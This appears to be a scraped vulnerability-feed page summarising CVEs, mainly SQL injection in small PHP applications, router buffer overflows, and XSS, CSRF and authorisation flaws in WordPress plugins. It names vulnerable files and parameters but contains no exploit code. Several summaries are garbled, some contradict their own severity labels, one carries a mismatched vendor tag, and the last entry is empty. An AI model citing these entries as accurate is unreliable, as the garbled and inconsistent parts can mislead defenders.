CVE-2025-6322 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /visit.php file's 'gname' parameter. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public exploit disclosure and confirmed POC availability significantly elevate real-world exploitation risk.

PHP SQLi Pre School Enrollment System
CVE-2025-6318 HIGH CVSS 7.3
CVE-2025-6318 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /admin/check_availability.php file where the 'Username' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. Public disclosure of exploitation details and confirmed POC availability indicate active exploitation risk in the wild.

PHP SQLi Pre School Enrollment System
CVE-2025-6317 HIGH CVSS 7.3
CVE-2025-6317 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /admin/confirm.php file's ID parameter. An unauthenticated remote attacker can execute arbitrary SQL commands with low complexity, potentially leading to unauthorized data access, modification, or service disruption. Public exploit disclosure and active attack feasibility significantly elevate real-world risk despite the moderate CVSS score of 7.3.

PHP SQLi Online Shoe Store
CVE-2025-6316 HIGH CVSS 7.3
CVE-2025-6316 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /admin/admin_running.php file where the 'qty' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this flaw to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while the CVSS score is 7.3 (high), the attack vector is network-based with low complexity, indicating active exploitation is feasible.

PHP SQLi Remote Code Execution Online Shoe Store
CVE-2025-6315 HIGH CVSS 7.3
CVE-2025-6315 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /cart2.php endpoint via an unsanitized ID parameter. An unauthenticated remote attacker can exploit this over the network with low complexity to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. A public proof-of-concept has been disclosed and the vulnerability may be actively exploited.

PHP SQLi Online Shoe Store
CVE-2025-6314 HIGH CVSS 7.3
CVE-2025-6314 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System 1.0, specifically in the /pages/cat_update.php file's ID parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete database contents. The vulnerability has a publicly disclosed exploit (POC available), making it an active threat with immediate exploitation risk; the CVSS 7.3 score reflects moderate-to-high severity with network-based attack capability and no authentication required.

PHP SQLi Sales And Inventory System
CVE-2025-6313 HIGH CVSS 7.3
CVE-2025-6313 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, affecting the /pages/cat_add.php endpoint where the 'Category' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with exploit code available and may be actively exploited in the wild.

PHP SQLi Sales And Inventory System
CVE-2025-6312 HIGH CVSS 7.3
CVE-2025-6312 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, specifically in the /pages/cash_transaction.php file where the 'cid' parameter is insufficiently sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploitation details available, making it actively exploitable in the wild.

PHP SQLi Sales And Inventory System
CVE-2025-6311 HIGH CVSS 7.3
CVE-2025-6311 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0 affecting the /pages/account_add.php endpoint. Unauthenticated remote attackers can manipulate the 'id' or 'amount' parameters to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure and demonstrates active exploitation risk with a CVSS score of 7.3 indicating medium-to-high severity.

PHP SQLi Sales And Inventory System
CVE-2025-6310 HIGH CVSS 7.3
A SQL injection vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Emergency Ambulance Hiring Portal
CVE-2025-6307 HIGH CVSS 7.3
CVE-2025-6307 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /function/edit_customer.php file, where the 'firstname' parameter is insufficiently sanitized, allowing remote unauthenticated attackers to execute arbitrary SQL queries. The vulnerability has been publicly disclosed with proof-of-concept details available, and while rated 7.3 (High) in CVSS v3.1, the network-accessible attack vector combined with no authentication requirement and demonstrated public exploitation significantly elevates real-world risk. Other parameters in the same function are suspected to be vulnerable to the same injection pattern.

PHP SQLi Online Shoe Store
CVE-2025-6306 HIGH CVSS 7.3
CVE-2025-6306 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the admin authentication mechanism in /admin/admin_index.php. An unauthenticated remote attacker can manipulate the Username parameter to execute arbitrary SQL queries, potentially leading to unauthorized access, data theft, or data manipulation. The vulnerability has been publicly disclosed with working exploits available, making active exploitation likely.

PHP SQLi Online Shoe Store
CVE-2025-6305 HIGH CVSS 7.3
CVE-2025-6305 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /admin/admin_feature.php endpoint via the product_code parameter. An unauthenticated remote attacker can execute arbitrary SQL commands to read, modify, or delete database contents. The vulnerability has public exploit disclosure and carries a CVSS 7.3 score with confirmed exploitation potential.

PHP SQLi Online Shoe Store
CVE-2025-6304 HIGH CVSS 7.3
CVE-2025-6304 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /cart.php file's qty[] parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete sensitive data. The vulnerability has been publicly disclosed with proof-of-concept exploits available, presenting immediate exploitation risk to unpatched instances of this e-commerce application.

PHP SQLi Online Shoe Store
CVE-2025-6303 HIGH CVSS 7.3
CVE-2025-6303 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /contactus1.php file's Message parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making active exploitation likely.

PHP SQLi Online Shoe Store
CVE-2025-6302 HIGH CVSS 8.8
CVE-2025-6302 is a critical stack-based buffer overflow vulnerability in TOTOLINK EX1200T router firmware version 4.1.2cu.5232_B20210713, specifically in the setStaticDhcpConfig function of /cgi-bin/cstecgi.cgi. An authenticated attacker can exploit this by sending a malicious Comment parameter to achieve remote code execution with full system compromise (confidentiality, integrity, and availability impact). Public exploit code has been disclosed, making this actively exploitable.

Buffer Overflow TP-Link Ex1200t Firmware TOTOLINK
CVE-2025-6300 HIGH CVSS 7.3
A SQL injection vulnerability in A vulnerability classified as critical (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Employee Record Management System
CVE-2025-6296 HIGH CVSS 7.3
CVE-2025-6296 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /empty_rooms.php file's search_box parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially achieving unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploits available, making active exploitation highly probable in real-world deployments.

PHP SQLi Hostel Management System
CVE-2025-6295 HIGH CVSS 7.3
A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Hostel Management System
CVE-2025-6294 HIGH CVSS 7.3
CVE-2025-6294 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /contact.php file's hostel_name parameter. An unauthenticated remote attacker can exploit this without user interaction to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while CVSS 7.3 indicates moderate-to-high severity with confidentiality, integrity, and availability impact, the simplicity of exploitation (network-accessible, no privileges required, low complexity) makes this a practical threat requiring immediate patching.

PHP SQLi Hostel Management System
CVE-2025-6293 HIGH CVSS 7.3
CVE-2025-6293 is a critical SQL injection vulnerability in code-projects Hostel Management System v1.0 affecting the /contact_manager.php endpoint, where the student_roll_no parameter is inadequately sanitized, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially exfiltrate, modify, or delete database records. Public exploit disclosure and active exploitation signals indicate this is a high-priority threat requiring immediate remediation.

PHP SQLi Hostel Management System
CVE-2025-6292 HIGH CVSS 8.8
CVE-2025-6292 is a critical stack-based buffer overflow vulnerability in D-Link DIR-825 routers (version 2.03 and potentially others) that allows authenticated attackers to execute arbitrary code remotely via malformed HTTP POST requests to the vulnerable HTTP POST Request Handler function. The vulnerability affects end-of-life products no longer receiving security updates from D-Link, and public exploit code has been disclosed, increasing real-world exploitation risk despite requiring valid credentials.

Buffer Overflow D-Link RCE Denial Of Service Dir 825 Firmware
CVE-2025-6291 HIGH CVSS 8.8
CVE-2025-6291 is a critical stack-based buffer overflow vulnerability in D-Link DIR-825 firmware version 2.03, exploitable via HTTP POST requests to the do_file function. An authenticated attacker can achieve complete system compromise (confidentiality, integrity, and availability violations) remotely without user interaction. Public exploit code exists and the affected product is end-of-life with no vendor support, elevating real-world risk despite authentication requirement.

Buffer Overflow D-Link RCE Dir 825 Firmware
CVE-2025-5121 HIGH CVSS 8.5
GitLab CE/EE contains a missing authorization check (CWE-862) in its compliance frameworks feature that allows authenticated users with limited privileges to apply compliance frameworks to projects outside the intended scope of the framework's group, potentially affecting confidentiality, integrity, and availability. This vulnerability affects GitLab versions 17.11 before 17.11.4 and 18.0 before 18.0.2. The CVSS 8.5 score reflects high severity due to the scope change and multiple impact categories, though exploitation requires low-level user authentication and higher-than-typical attack complexity.

Gitlab Privilege Escalation
CVE-2025-4102 HIGH CVSS 7.2
The Beaver Builder Plugin (Starter Version) for WordPress contains an arbitrary file upload vulnerability in the 'save_enabled_icons' function due to missing file type validation, affecting all versions up to and including 2.9.1. Authenticated attackers with Administrator-level access can upload arbitrary files to the server, potentially enabling remote code execution. The vulnerability was only partially patched in version 2.9.1, indicating residual risk in the latest release.

WordPress RCE PHP Privilege Escalation Beaver Builder
CVE-2025-3319 HIGH CVSS 8.1
CVE-2025-3319 is an authentication bypass vulnerability in IBM Spectrum Protect Server versions 8.1 through 8.1.26 caused by improper session authentication mechanisms. This flaw allows unauthenticated network attackers to bypass authentication and gain unauthorized access to protected resources, potentially compromising backup and recovery infrastructure. With a CVSS score of 8.1 (High) and network-based attack vector, this vulnerability poses significant risk to organizations relying on Spectrum Protect for data protection.

IBM Authentication Bypass Spectrum Protect Server
CVE-2025-2443 HIGH CVSS 8.7
A security vulnerability in all (CVSS 8.7) that allows for cross-site-scripting attack and content security policy bypass. High severity vulnerability requiring prompt remediation.

Gitlab Authentication Bypass
CVE-2024-4994 HIGH CVSS 8.1
CVE-2024-4994 is a Cross-Site Request Forgery (CSRF) vulnerability in GitLab's GraphQL API that allows unauthenticated attackers to execute arbitrary GraphQL mutations through a malicious website visited by authenticated GitLab users. This affects GitLab CE/EE versions 16.1.0-16.11.4, 17.0.0-17.0.2, and 17.1.0, with a CVSS score of 8.1 indicating high severity. The vulnerability requires user interaction (clicking a malicious link) but can result in unauthorized data manipulation or system compromise depending on the mutations executed.

CSRF Gitlab RCE
CVE-2025-52733 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anonform Ab ANON::form embedded secure form allows DOM-Based XSS. This issue affects ANON::form embedded secure form: from n/a through 1.7.

XSS
CVE-2025-52719 MEDIUM CVSS 4.3
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Metagauss ProfileGrid allows Retrieve Embedded Sensitive Data. This issue affects ProfileGrid : from n/a through 5.9.5.2.

Information Disclosure
CVE-2025-52713 MEDIUM CVSS 6.4
Server-Side Request Forgery (SSRF) vulnerability in BoldGrid Post and Page Builder by BoldGrid - Visual Drag and Drop Editor allows Server Side Request Forgery. This issue affects Post and Page Builder by BoldGrid - Visual Drag and Drop Editor: from n/a through 1.27.8.

SSRF
CVE-2025-52711 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in BoldGrid Post and Page Builder by BoldGrid - Visual Drag and Drop Editor allows Cross Site Request Forgery.This issue affects Post and Page Builder by BoldGrid - Visual Drag and Drop Editor: from n/a through 1.27.8.

CSRF
CVE-2025-52710 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ninja Team File Manager Pro allows Stored XSS. This issue affects File Manager Pro: from n/a through 1.8.8.

XSS
CVE-2025-52707 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FirelightWP Firelight Lightbox allows Stored XSS. This issue affects Firelight Lightbox: from n/a through 2.3.16.

XSS
CVE-2025-50054 MEDIUM CVSS 5.5
Buffer overflow in OpenVPN ovpn-dco-win version 1.3.0 and earlier and version 2.5.8 and earlier allows a local user process to send a too large control message buffer to the kernel driver resulting in a system crash

Buffer Overflow Heap Overflow Ovpn Dco Win
CVE-2025-50051 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chad Butler WP-Members allows Stored XSS.This issue affects WP-Members: from n/a through 3.5.4.

XSS
CVE-2025-50050 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress allows Stored XSS. This issue affects Jobs for WordPress: from n/a through 2.7.12.

WordPress XSS PHP
CVE-2025-50049 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in prismtechstudios Modern Footnotes allows Stored XSS. This issue affects Modern Footnotes: from n/a through 1.4.19.

XSS
CVE-2025-50048 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atakan Au Automatically Hierarchic Categories in Menu allows Stored XSS. This issue affects Automatically Hierarchic Categories in Menu: from n/a through 2.0.9.

XSS
CVE-2025-50047 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webvitaly Sitekit allows Stored XSS. This issue affects Sitekit: from n/a through 1.9.

XSS
CVE-2025-50046 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.

XSS
CVE-2025-50045 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ProWCPlugins Related Products Manager for WooCommerce allows DOM-Based XSS. This issue affects Related Products Manager for WooCommerce: from n/a through 1.6.2.

WordPress XSS PHP
CVE-2025-50044 MEDIUM CVSS 6.5
Cross-Site Request Forgery (CSRF) vulnerability in Rameez Iqbal Real Estate Manager allows Cross Site Request Forgery. This issue affects Real Estate Manager: from n/a through 7.3.

CSRF
CVE-2025-50043 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jordy Meow Code Engine allows Stored XSS. This issue affects Code Engine: from n/a through 0.3.2.

XSS
CVE-2025-50042 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aviplugins.com WP Register Profile With Shortcode allows Stored XSS. This issue affects WP Register Profile With Shortcode: from n/a through 3.6.1.

XSS
CVE-2025-50041 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Engine Gutenberg Blocks - ACF Blocks Suite allows Stored XSS. This issue affects Gutenberg Blocks - ACF Blocks Suite: from n/a through 2.6.11.

XSS
CVE-2025-50038 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anantaddons Anant Addons for Elementor allows Stored XSS. This issue affects Anant Addons for Elementor: from n/a through 1.2.0.

XSS
CVE-2025-50037 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Buying Buddy Buying Buddy IDX CRM allows DOM-Based XSS. This issue affects Buying Buddy IDX CRM: from n/a through 2.3.0.

XSS
CVE-2025-50036 MEDIUM CVSS 6.5
Cross-Site Request Forgery (CSRF) vulnerability in Yamna Khawaja Mailing Group Listserv allows Cross Site Request Forgery. This issue affects Mailing Group Listserv: from n/a through 3.0.5.

CSRF
CVE-2025-50035 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CyrilG Fyrebox Quizzes allows Stored XSS. This issue affects Fyrebox Quizzes: from n/a through 3.0.

XSS
CVE-2025-50034 MEDIUM CVSS 6.5
A security vulnerability in Missing Authorization vulnerability in Mahmudul (CVSS 6.5). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-50033 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sparkle Themes Fitness Park allows DOM-Based XSS. This issue affects Fitness Park: from n/a through 1.1.1.

XSS
CVE-2025-50030 MEDIUM CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sparkle Themes Spark Multipurpose allows DOM-Based XSS. This issue affects Spark Multipurpose: from n/a through 1.0.7.

XSS
CVE-2025-50027 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xootix Login/Signup Popup allows Stored XSS. This issue affects Login/Signup Popup: from n/a through 2.9.4.

XSS
CVE-2025-50026 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in spoki Spoki allows Stored XSS. This issue affects Spoki: from n/a through 2.16.0.

XSS
CVE-2025-50025 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codepeople CP Polls allows Stored XSS. This issue affects CP Polls: from n/a through 1.0.81.

XSS
CVE-2025-50024 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Truong Thanh ATP Call Now allows Stored XSS. This issue affects ATP Call Now: from n/a through 1.0.3.

XSS
CVE-2025-50023 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Coyier CodePen Embed Block allows Stored XSS. This issue affects CodePen Embed Block: from n/a through 1.1.1.

XSS
CVE-2025-50022 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in justin_k WP-FB-AutoConnect allows Stored XSS. This issue affects WP-FB-AutoConnect: from n/a through 4.6.3.

XSS
CVE-2025-50021 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Robert Peake Better Random Redirect allows Stored XSS. This issue affects Better Random Redirect: from n/a through 1.3.20.

XSS
CVE-2025-50020 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nitin Yawalkar RDFa Breadcrumb allows Stored XSS. This issue affects RDFa Breadcrumb: from n/a through 2.3.

XSS
CVE-2025-50019 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sandor Kovacs Simple Sticky Footer allows Stored XSS. This issue affects Simple Sticky Footer : from n/a through 1.3.5.

XSS
CVE-2025-50018 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tealium Tealium allows Stored XSS. This issue affects Tealium: from n/a through 2.1.17.

XSS
CVE-2025-50017 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt WP Voting Contest allows Stored XSS. This issue affects WP Voting Contest: from n/a through 5.8.

XSS
CVE-2025-50016 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in brijeshk89 IP Based Login allows Stored XSS. This issue affects IP Based Login: from n/a through 2.4.2.

XSS
CVE-2025-50015 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rodrigo Bastos Hand Talk allows Stored XSS. This issue affects Hand Talk: from n/a through 6.0.

XSS
CVE-2025-50014 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iamapinan PDPA Consent for Thailand allows Stored XSS. This issue affects PDPA Consent for Thailand: from n/a through 1.1.1.

XSS
CVE-2025-50013 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jason Judge CSV Importer Improved allows Stored XSS. This issue affects CSV Importer Improved: from n/a through 0.6.1.

XSS
CVE-2025-50012 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fridaysystems Inventory Presser allows Stored XSS. This issue affects Inventory Presser: from n/a through 15.0.0.

XSS
CVE-2025-50011 MEDIUM CVSS 5.9
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Félix Martínez Recipes manager - WPH allows Stored XSS. This issue affects Recipes manager - WPH: from n/a through 1.0.4.

XSS
CVE-2025-50010 MEDIUM CVSS 5.4
Missing Authorization vulnerability in Zapier Zapier for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zapier for WordPress: from n/a through 1.5.2.

WordPress Authentication Bypass PHP
CVE-2025-50009 MEDIUM CVSS 5.4
Missing Authorization vulnerability in Climax Themes Kata Plus allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Kata Plus: from n/a through 1.5.3.

Authentication Bypass
CVE-2025-50008 MEDIUM CVSS 5.4
A remote code execution vulnerability (CVSS 5.4). Remediation should follow standard vulnerability management procedures.

WordPress Authentication Bypass PHP
CVE-2025-49998 MEDIUM CVSS 5.4
Missing Authorization vulnerability in Wetail WooCommerce Fortnox Integration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce Fortnox Integration: from n/a through 4.5.5.

WordPress Authentication Bypass PHP
CVE-2025-49997 MEDIUM CVSS 5.3
Missing Authorization vulnerability in Syed Balkhi Giveaways and Contests by RafflePress allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Giveaways and Contests by RafflePress: from n/a through 1.12.17.

Authentication Bypass
CVE-2025-49996 MEDIUM CVSS 5.3
A security vulnerability in osama (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49995 MEDIUM CVSS 5.3
CVE-2025-49995 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49993 MEDIUM CVSS 5.3
Missing Authorization vulnerability in Cookie Script Cookie-Script.com allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cookie-Script.com: from n/a through 1.2.1.

Authentication Bypass
CVE-2025-49991 MEDIUM CVSS 5.3
A security vulnerability in Missing Authorization vulnerability in tggfref WP-Recall (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49990 MEDIUM CVSS 5.3
A security vulnerability in Missing Authorization vulnerability in contentstudio ContentStudio (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49989 MEDIUM CVSS 5.3
Missing Authorization vulnerability in App Cheap App Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects App Builder: from n/a through 5.5.3.

Authentication Bypass
CVE-2025-49988 MEDIUM CVSS 5.3
Missing Authorization vulnerability in Renzo Contact Form 7 AWeber Extension allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form 7 AWeber Extension: from n/a through 0.1.38.

Authentication Bypass
CVE-2025-49987 MEDIUM CVSS 5.3
Missing Authorization vulnerability in WPFactory CRM ERP Business Solution allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CRM ERP Business Solution: from n/a through 1.13.

Authentication Bypass
CVE-2025-49986 MEDIUM CVSS 5.3
A security vulnerability in Missing Authorization vulnerability in thanhtungtnt Video List Manager (CVSS 5.3) that allows accessing functionality not properly constrained. Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49985 MEDIUM CVSS 4.9
Server-Side Request Forgery (SSRF) vulnerability in Ali Irani Auto Upload Images allows Server Side Request Forgery. This issue affects Auto Upload Images: from n/a through 3.3.2.

SSRF
CVE-2025-49984 MEDIUM CVSS 4.9
Server-Side Request Forgery (SSRF) vulnerability in Angelo Mandato PowerPress Podcasting allows Server Side Request Forgery. This issue affects PowerPress Podcasting: from n/a through 11.12.11.

SSRF
CVE-2025-49983 MEDIUM CVSS 4.9
Server-Side Request Forgery (SSRF) vulnerability in Joe Hoyle WPThumb allows Server Side Request Forgery. This issue affects WPThumb: from n/a through 0.10.

SSRF
CVE-2025-49982 MEDIUM CVSS 4.3
A security vulnerability in Missing Authorization vulnerability in aguilatechnologies WP Customer Area (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49981 MEDIUM CVSS 4.3
A security vulnerability in Missing Authorization vulnerability in mahabub81 User Roles and Capabilities (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49980 MEDIUM CVSS 4.3
Missing Authorization vulnerability in WP Event Manager WP User Profile Avatar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP User Profile Avatar: from n/a through 1.0.6.

Authentication Bypass
CVE-2025-49979 MEDIUM CVSS 4.3
A security vulnerability in Missing Authorization vulnerability in slui Media Hygiene (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49978 MEDIUM CVSS 4.3
CVE-2025-49978 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49977 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in WP Inventory WP Inventory Manager allows Cross Site Request Forgery. This issue affects WP Inventory Manager: from n/a through 2.3.4.

CSRF
CVE-2025-49976 MEDIUM CVSS 4.3
Missing Authorization vulnerability in WANotifier WANotifier allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WANotifier: from n/a through 2.7.7.

Authentication Bypass
CVE-2025-49975 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Hossni Mubarak JobWP allows Cross Site Request Forgery. This issue affects JobWP: from n/a through 2.4.0.

CSRF
CVE-2025-49974 MEDIUM CVSS 4.3
A security vulnerability in a Project Management (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

WordPress Authentication Bypass PHP
CVE-2025-49973 MEDIUM CVSS 4.3
Missing Authorization vulnerability in GrandPlugins Image Sizes Controller, Create Custom Image Sizes, Disable Image Sizes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Sizes Controller, Create Custom Image Sizes, Disable Image Sizes: from n/a through 1.0.9.

Authentication Bypass
CVE-2025-49972 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in David Wood TM Replace Howdy allows Cross Site Request Forgery. This issue affects TM Replace Howdy: from n/a through 1.4.2.

CSRF
CVE-2025-49971 MEDIUM CVSS 4.3
CVE-2025-49971 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49970 MEDIUM CVSS 4.3
A security vulnerability in Missing Authorization vulnerability in sparklewpthemes Hello FSE Blog (CVSS 4.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-49969 MEDIUM CVSS 4.3
Missing Authorization vulnerability in Zara 4 Zara 4 Image Compression allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zara 4 Image Compression: from n/a through 1.2.17.2.

Authentication Bypass
CVE-2025-49968 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Oganro XML Travel Portal Widget allows Cross Site Request Forgery. This issue affects XML Travel Portal Widget: from n/a through 2.0.

CSRF
CVE-2025-49967 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in marcusjansen Live Sports Streamthunder allows Cross Site Request Forgery. This issue affects Live Sports Streamthunder: from n/a through 2.1.

CSRF
CVE-2025-49966 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Oganro Oganro Travel Portal Search Widget for HotelBeds APITUDE API allows Cross Site Request Forgery. This issue affects Oganro Travel Portal Search Widget for HotelBeds APITUDE API: from n/a through 1.0.

CSRF
CVE-2025-49965 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Oganro PixelBeds Channel Manager and Hotel Booking Engine allows Cross Site Request Forgery. This issue affects PixelBeds Channel Manager and Hotel Booking Engine: from n/a through 1.0.

CSRF
CVE-2025-49964 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in indgeek ClipLink allows Cross Site Request Forgery. This issue affects ClipLink: from n/a through 1.1.

CSRF
CVE-2025-48058 MEDIUM CVSS 6.3
PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to version 6.7.2, there is a potential polynomial Regular Expression Denial of Service (ReDoS) vulnerability in the PowSyBl's DataSource mechanism. If successfully exploited, a malicious actor can cause significant CPU consumption due to regex backtracking - even with polynomial patterns. This issue has been patched in com.powsybl:powsybl-commons: 6.7.2.

Denial Of Service
CVE-2025-46158 MEDIUM CVSS 6.2
An issue in redoxOS kernel before commit 5d41cd7c allows a local attacker to cause a denial of service via the `setitimer` syscall

Denial Of Service Redox
CVE-2025-38083 MEDIUM CVSS 4.7
